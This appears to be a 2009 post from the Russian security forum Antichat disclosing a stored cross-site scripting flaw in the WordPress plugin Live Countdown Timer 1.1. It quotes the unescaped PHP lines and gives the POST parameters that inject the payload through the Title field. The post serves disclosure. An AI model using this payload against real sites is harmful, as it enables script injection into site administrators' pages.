Форум АНТИЧАТ - Показать сообщение отдельно

WordPress Plugin <Live Countdown Timer 1.1> aXSS Vuln

Цитата:

WordPress Plugin <Live Countdown Timer 1.1> aXSS Vuln
http://www.appchain.com/2009/06/live-countdown-timer-1-1/

(c)eLwaux 30.06.2009, uasc.org.ua

## ## ## ## ## ##

aXSS
\live-countdown-timer\live-countdown-timer.php

-----------------------------------------------------------------------------
142: $xPostArr[0] = $_POST['live_countdown_timer_Title'];
147: update_option('live_countdown_timer_Values', serialize($xPostArr));
....
149: $xDBArr = unserialize(get_option('live_countdown_timer_Value s'));
150: $live_countdown_timer_Title = $xDBArr[0];
169: <input type="tex...le" value="<?php echo $live_countdown_timer_Title;?>" />
-----------------------------------------------------------------------------

exploit:
POST: live_countdown_timer_days = .
POST: live_countdown_timer_Title = ">{aXSS}<div id="
POST: live_countdown_timer_seconds = 12
POST: live_countdown_timer_hours = 11
POST: live_countdown_timer_days = 10